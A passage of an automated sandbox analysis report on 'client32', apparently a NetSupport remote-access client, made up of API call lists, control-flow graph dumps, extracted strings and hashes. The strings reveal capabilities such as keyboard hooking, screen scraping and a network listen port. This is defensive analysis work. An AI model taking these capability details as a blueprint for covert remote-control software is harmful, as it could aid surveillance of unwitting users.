                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                              • _free.LIBCMT ref: 110AA240
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                              • GetLastError.KERNEL32 ref: 110AA27D
                                                                              • _malloc.LIBCMT ref: 110AA293
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                              • GetLastError.KERNEL32 ref: 110AA301
                                                                              • _free.LIBCMT ref: 110AA313
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                              • _free.LIBCMT ref: 110AA344
                                                                              • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                              • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                              • API String ID: 3464732724-3340099623
                                                                              • Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                              • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                              • Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                              • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50
                                                                              Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2043 1102e199 2044 1102e1a0-1102e1b1 2043->2044 2044->2044 2045 1102e1b3 2044->2045 2046 1102e2f4-1102e30d call 11143690 2045->2046 2049 1102e313-1102e315 2046->2049 2050 1102e190-1102e193 2046->2050 2053 1102e413-1102e42d call 11146fe0 2049->2053 2054 1102e31b-1102e321 2049->2054 2051 1102e195-1102e197 2050->2051 2052 1102e1b8-1102e1c1 2050->2052 2051->2044 2052->2046 2055 1102e1c7-1102e1ce 2052->2055 2072 1102e483-1102e48f call 1102bc40 2053->2072 2073 1102e42f-1102e448 call 1105e820 2053->2073 2057 1102e323-1102e332 call 11145990 2054->2057 2058 1102e338-1102e348 2054->2058 2055->2046 2062 1102e2c3-1102e2d8 call 11163ca7 2055->2062 2063 1102e1d5-1102e1d7 2055->2063 2064 1102e2da-1102e2ef call 11163ca7 2055->2064 2065 1102e26a-1102e29d call 11162777 call 11142e60 2055->2065 2066 1102e2ab-1102e2c1 _strncpy 2055->2066 2067 1102e25b-1102e265 2055->2067 2068 1102e29f-1102e2a9 2055->2068 2069 1102e21c-1102e222 2055->2069 2070 1102e24c-1102e256 2055->2070 2057->2058 2060 1102e34a 2058->2060 2061 1102e34f-1102e36d call 1102d360 2058->2061 2060->2061 2061->2053 2094 1102e373-1102e398 call 110b7df0 call 11147060 2061->2094 2062->2046 2063->2046 2079 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2063->2079 2064->2046 2065->2046 2066->2046 2067->2046 2068->2046 2080 1102e224-1102e238 call 11163ca7 2069->2080 2081 1102e23d-1102e247 2069->2081 2070->2046 2096 1102e491-1102e498 2072->2096 2097 1102e468-1102e46f 2072->2097 2073->2072 2098 1102e44a-1102e45c 2073->2098 2079->2046 2080->2046 2081->2046 2125 1102e3a3-1102e3a9 2094->2125 2126 1102e39a-1102e3a1 2094->2126 2102 1102e475-1102e478 2096->2102 2103 1102e49a-1102e4a4 2096->2103 2097->2102 2104 1102e67a-1102e69b GetComputerNameA 2097->2104 2098->2072 2116 1102e45e 2098->2116 2108 1102e47a-1102e481 call 110b7df0 2102->2108 2109 1102e4a9 2102->2109 2103->2104 2113 1102e6d3-1102e6d9 2104->2113 2114 1102e69d-1102e6d1 call 11028230 2104->2114 2115 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2108->2115 2109->2115 2118 1102e6db-1102e6e0 2113->2118 2119 1102e70f-1102e722 _strncpy 2113->2119 2114->2113 2144 1102e727-1102e733 2114->2144 2177 1102e64a-1102e652 SetLastError 2115->2177 2178 1102e58c-1102e5a3 2115->2178 2116->2097 2122 1102e6e6-1102e6ea 2118->2122 2124 1102e917-1102e93a 2119->2124 2133 1102e706-1102e708 2122->2133 2134 1102e6ec-1102e6ee 2122->2134 2146 1102e962-1102e96a 2124->2146 2147 1102e93c-1102e942 2124->2147 2129 1102e3ab-1102e3b2 call 11028360 2125->2129 2130 1102e409 2125->2130 2126->2053 2129->2130 2153 1102e3b4-1102e3e6 2129->2153 2130->2053 2136 1102e70b-1102e70d 2133->2136 2138 1102e702-1102e704 2134->2138 2139 1102e6f0-1102e6f6 2134->2139 2136->2119 2136->2144 2138->2136 2139->2133 2145 1102e6f8-1102e700 2139->2145 2151 1102e735-1102e74a call 110b7df0 call 1102a1f0 2144->2151 2152 1102e74c-1102e75f call 11081d30 2144->2152 2145->2122 2145->2138 2149 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2146->2149 2150 1102e96c-1102e979 call 11036710 call 11162777 2146->2150 2147->2146 2154 1102e944-1102e95d call 1102d900 2147->2154 2150->2149 2185 1102e7a3-1102e7bc call 11081d30 2151->2185 2174 1102e761-1102e784 2152->2174 2175 1102e786-1102e788 2152->2175 2169 1102e3f0-1102e3ff call 110f64d0 2153->2169 2170 1102e3e8-1102e3ee 2153->2170 2154->2146 2181 1102e402-1102e404 call 1102d900 2169->2181 2170->2169 2170->2181 2174->2185 2176 1102e790-1102e7a1 2175->2176 2176->2176 2176->2185 2184 1102e613-1102e61f 2177->2184 2178->2184 2200 1102e5a5-1102e5ae 2178->2200 2181->2130 2190 1102e662-1102e671 2184->2190 2191 1102e621-1102e62d 2184->2191 2202 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2185->2202 2203 1102e8fc-1102e909 _strncpy 2185->2203 2190->2104 2198 1102e673-1102e674 FreeLibrary 2190->2198 2195 1102e63f-1102e643 2191->2195 2196 1102e62f-1102e63d GetProcAddress 2191->2196 2204 1102e654-1102e656 SetLastError 2195->2204 2205 1102e645-1102e648 2195->2205 2196->2195 2198->2104 2200->2184 2206 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2200->2206 2237 1102e853-1102e869 call 11129e00 2202->2237 2238 1102e83f-1102e84e call 11029a70 2202->2238 2209 1102e90c-1102e911 CharUpperA 2203->2209 2207 1102e65c 2204->2207 2205->2207 2206->2184 2224 1102e5e8-1102e60e call 11147060 call 11027f80 2206->2224 2207->2190 2209->2124 2224->2184 2242 1102e882-1102e8bc call 110d0e20 * 2 2237->2242 2243 1102e86b-1102e87d call 110d0e20 2237->2243 2238->2237 2250 1102e8d2-1102e8fa _strncpy call 110d0a10 2242->2250 2251 1102e8be-1102e8cd call 11029a70 2242->2251 2243->2242 2250->2209 2251->2250
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: $18/11/16 11:28:14 V12.10F20$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 1029625771-878608103
                                                                              • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                              • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51
                                                                              Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2255 11142010-11142051 call 11147060 2258 11142057-111420b3 LoadLibraryA 2255->2258 2259 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2255->2259 2260 111420b5-111420c0 call 11017a40 2258->2260 2261 111420c7-111420d0 2258->2261 2271 11142105-1114210b 2259->2271 2272 11142133 2259->2272 2260->2261 2268 111420c2 call 110ccc90 2260->2268 2261->2259 2264 111420d2-111420d3 FreeLibrary 2261->2264 2264->2259 2268->2261 2271->2272 2274 1114210d-11142113 2271->2274 2273 1114213d-1114215d GetClassInfoExA 2272->2273 2275 11142163-1114218a _memset call 11145080 2273->2275 2276 111421fe-11142256 2273->2276 2274->2272 2277 11142115-11142131 call 1105e820 2274->2277 2283 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2275->2283 2284 1114218c-111421a0 call 11029a70 2275->2284 2288 11142292-11142298 2276->2288 2289 11142258-1114225e 2276->2289 2277->2273 2283->2276 2302 111421e7-111421fb call 11029a70 2283->2302 2284->2283 2294 111422d4-111422f6 call 1105e820 2288->2294 2295 1114229a-111422a9 call 111101b0 2288->2295 2289->2288 2292 11142260-11142266 2289->2292 2292->2288 2297 11142268-1114227f call 1112d770 LoadLibraryA 2292->2297 2306 11142304-11142309 2294->2306 2307 111422f8-11142302 2294->2307 2304 111422cd 2295->2304 2305 111422ab-111422cb 2295->2305 2297->2288 2314 11142281-1114228d GetProcAddress 2297->2314 2302->2276 2311 111422cf 2304->2311 2305->2311 2312 11142315-1114231b 2306->2312 2313 1114230b 2306->2313 2307->2312 2311->2294 2315 1114231d-11142323 call 110f8230 2312->2315 2316 11142328-11142341 call 1113d9a0 2312->2316 2313->2312 2314->2288 2315->2316 2321 11142347-1114234d 2316->2321 2322 111423e9-111423fa 2316->2322 2323 1114234f-11142361 call 111101b0 2321->2323 2324 11142389-1114238f 2321->2324 2334 11142363-11142379 call 1115e590 2323->2334 2335 1114237b 2323->2335 2326 111423b5-111423c1 2324->2326 2327 11142391-11142397 2324->2327 2328 111423c3-111423c9 2326->2328 2329 111423d8-111423e3 #17 LoadLibraryA 2326->2329 2331 1114239e-111423b0 SetTimer 2327->2331 2332 11142399 call 11135840 2327->2332 2328->2329 2333 111423cb-111423d1 2328->2333 2329->2322 2331->2326 2332->2331 2333->2329 2337 111423d3 call 1112e5e0 2333->2337 2339 1114237d-11142384 2334->2339 2335->2339 2337->2329 2339->2324
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                              • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                              • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                              • _memset.LIBCMT ref: 11142169
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                              • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                              • RegisterClassExA.USER32(?), ref: 111421DA
                                                                              • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                              • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                              • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                              • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                              • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AB86ACF8,11030346,00000000), ref: 11017A6E
                                                                                • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                              • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                              • API String ID: 3706574701-3145203681
                                                                              • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                              • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55
                                                                              Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2342 11028c10-11028c2d 2343 11028c33-11028c62 2342->2343 2344 110292f8-110292ff 2342->2344 2345 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2343->2345 2346 11028c68-11028c6e 2343->2346 2347 11029311-11029315 2344->2347 2348 11029301-1102930a 2344->2348 2362 11028d3d 2345->2362 2349 11028c70-11028c78 2346->2349 2351 11029317-11029329 call 11162bb7 2347->2351 2352 1102932a-1102933e call 11162bb7 2347->2352 2348->2347 2350 1102930c 2348->2350 2349->2349 2355 11028c7a-11028c80 2349->2355 2350->2347 2359 11028c83-11028c88 2355->2359 2359->2359 2363 11028c8a-11028c94 2359->2363 2364 11028d40-11028d4a 2362->2364 2365 11028cb1-11028cb7 2363->2365 2366 11028c96-11028c9d 2363->2366 2367 11028d50-11028d53 2364->2367 2368 110292ef-110292f7 2364->2368 2370 11028cb8-11028cbe 2365->2370 2369 11028ca0-11028ca6 2366->2369 2367->2368 2371 11028d59-11028d67 call 11026ef0 2367->2371 2368->2344 2369->2369 2372 11028ca8-11028cae 2369->2372 2370->2370 2373 11028cc0-11028cee call 11164ead 2370->2373 2378 11029275-1102928a call 11164c77 2371->2378 2379 11028d6d-11028d80 call 11163ca7 2371->2379 2372->2365 2373->2364 2378->2368 2384 11029290-110292ea 2378->2384 2385 11028d82-11028d85 2379->2385 2386 11028d8b-11028db3 call 11026d60 call 11026ef0 2379->2386 2384->2368 2385->2378 2385->2386 2386->2378 2391 11028db9-11028dd6 call 11026fe0 call 11026ef0 2386->2391 2396 110291e5-110291ec 2391->2396 2397 11028ddc 2391->2397 2398 11029212-11029219 2396->2398 2399 110291ee-110291f1 2396->2399 2400 11028de0-11028e00 call 11026d60 2397->2400 2402 11029231-11029238 2398->2402 2403 1102921b-11029221 2398->2403 2399->2398 2401 110291f3-110291fa 2399->2401 2410 11028e02-11028e05 2400->2410 2411 11028e36-11028e39 2400->2411 2405 11029200-11029210 2401->2405 2407 1102923a-11029245 2402->2407 2408 11029248-1102924f 2402->2408 2406 11029227-1102922f 2403->2406 2405->2398 2405->2405 2406->2402 2406->2406 2407->2408 2412 11029251-1102925b 2408->2412 2413 1102925e-11029265 2408->2413 2416 11028e07-11028e0e 2410->2416 2417 11028e1e-11028e21 2410->2417 2414 110291ce-110291df call 11026ef0 2411->2414 2415 11028e3f-11028e52 call 11165010 2411->2415 2412->2413 2413->2378 2418 11029267-11029272 2413->2418 2414->2396 2414->2400 2415->2414 2425 11028e58-11028e74 call 1116558e 2415->2425 2420 11028e14-11028e1c 2416->2420 2417->2414 2421 11028e27-11028e31 2417->2421 2418->2378 2420->2417 2420->2420 2421->2414 2428 11028e76-11028e7c 2425->2428 2429 11028e8f-11028ea5 call 1116558e 2425->2429 2430 11028e80-11028e88 2428->2430 2434 11028ea7-11028ead 2429->2434 2435 11028ebf-11028ed5 call 1116558e 2429->2435 2430->2430 2432 11028e8a 2430->2432 2432->2414 2437 11028eb0-11028eb8 2434->2437 2440 11028ed7-11028edd 2435->2440 2441 11028eef-11028f05 call 1116558e 2435->2441 2437->2437 2439 11028eba 2437->2439 2439->2414 2442 11028ee0-11028ee8 2440->2442 2446 11028f07-11028f0d 2441->2446 2447 11028f1f-11028f35 call 1116558e 2441->2447 2442->2442 2444 11028eea 2442->2444 2444->2414 2448 11028f10-11028f18 2446->2448 2452 11028f37-11028f3d 2447->2452 2453 11028f4f-11028f65 call 1116558e 2447->2453 2448->2448 2450 11028f1a 2448->2450 2450->2414 2455 11028f40-11028f48 2452->2455 2458 11028f67-11028f6d 2453->2458 2459 11028f7f-11028f95 call 1116558e 2453->2459 2455->2455 2456 11028f4a 2455->2456 2456->2414 2460 11028f70-11028f78 2458->2460 2464 11028f97-11028f9d 2459->2464 2465 11028faf-11028fc5 call 1116558e 2459->2465 2460->2460 2462 11028f7a 2460->2462 2462->2414 2466 11028fa0-11028fa8 2464->2466 2470 11028fc7-11028fcd 2465->2470 2471 11028fdf-11028ff5 call 1116558e 2465->2471 2466->2466 2468 11028faa 2466->2468 2468->2414 2472 11028fd0-11028fd8 2470->2472 2476 11028ff7-11028ffd 2471->2476 2477 1102900f-11029025 call 1116558e 2471->2477 2472->2472 2474 11028fda 2472->2474 2474->2414 2478 11029000-11029008 2476->2478 2482 11029027-1102902d 2477->2482 2483 1102903f-11029055 call 1116558e 2477->2483 2478->2478 2480 1102900a 2478->2480 2480->2414 2485 11029030-11029038 2482->2485 2488 11029057-1102905d 2483->2488 2489 1102906f-11029085 call 1116558e 2483->2489 2485->2485 2487 1102903a 2485->2487 2487->2414 2490 11029060-11029068 2488->2490 2494 110290a6-110290bc call 1116558e 2489->2494 2495 11029087-1102908d 2489->2495 2490->2490 2492 1102906a 2490->2492 2492->2414 2500 110290d3-110290e9 call 1116558e 2494->2500 2501 110290be 2494->2501 2496 11029097-1102909f 2495->2496 2496->2496 2498 110290a1 2496->2498 2498->2414 2506 11029100-11029116 call 1116558e 2500->2506 2507 110290eb 2500->2507 2503 110290c4-110290cc 2501->2503 2503->2503 2504 110290ce 2503->2504 2504->2414 2512 11029137-1102914d call 1116558e 2506->2512 2513 11029118-1102911e 2506->2513 2508 110290f1-110290f9 2507->2508 2508->2508 2510 110290fb 2508->2510 2510->2414 2518 1102916f-11029185 call 1116558e 2512->2518 2519 1102914f-1102915f 2512->2519 2514 11029128-11029130 2513->2514 2514->2514 2516 11029132 2514->2516 2516->2414 2524 11029187-1102918d 2518->2524 2525 1102919c-110291b2 call 1116558e 2518->2525 2520 11029160-11029168 2519->2520 2520->2520 2522 1102916a 2520->2522 2522->2414 2526 11029190-11029198 2524->2526 2525->2414 2530 110291b4-110291ba 2525->2530 2526->2526 2528 1102919a 2526->2528 2528->2414 2531 110291c4-110291cc 2530->2531 2531->2414 2531->2531
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73AA1370,?,0000001A), ref: 11028CFD
                                                                              • _strrchr.LIBCMT ref: 11028D0C
                                                                                • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileModuleName__stricmp_l_strrchr
                                                                              • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                              • API String ID: 1609618855-357498123
                                                                              • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                              • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                              • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                              • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                              Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2532 11030ef3-11030f1a RegOpenKeyExA 2533 11030f20-11030f4f call 11143bd0 2532->2533 2534 1103103d-1103105b 2532->2534 2543 11031030-11031037 RegCloseKey 2533->2543 2544 11030f55-11030f72 call 11163ca7 call 111648ed 2533->2544 2537 11031061-1103107b 2534->2537 2538 11031135-1103113f 2534->2538 2540 11031081-1103109f call 111101b0 call 11109bc0 2537->2540 2538->2540 2541 11031145-11031168 call 111101b0 call 110fae60 2538->2541 2560 110310a4-110312d6 2540->2560 2564 110312db-1103131f GetStockObject GetObjectA 2541->2564 2543->2534 2557 11030f86-11030f89 2544->2557 2558 11030f74-11030f84 call 111648ed 2544->2558 2562 11030f8b 2557->2562 2563 11030f8c-11030f98 call 11163ca7 2557->2563 2558->2557 2560->2564 2562->2563 2563->2543 2572 11030f9e-11030faa 2563->2572 2570 11031321 2564->2570 2571 1103132b-11031497 SetErrorMode * 2 call 111101b0 call 11028980 call 111101b0 call 11028980 InterlockedExchange call 111101b0 call 1108a880 GetACP call 11163f93 call 111663a3 call 11143770 call 11143780 call 111101b0 call 11061aa0 2564->2571 2570->2571 2613 11031499 2571->2613 2614 1103149f-110314a5 2571->2614 2572->2543 2574 11030fb0-11030fb3 2572->2574 2574->2543 2576 11030fb5-1103100c call 11143bd0 * 2 2574->2576 2585 11031011-1103101c 2576->2585 2585->2543 2586 1103101e-1103102a 2585->2586 2586->2543 2613->2614 2615 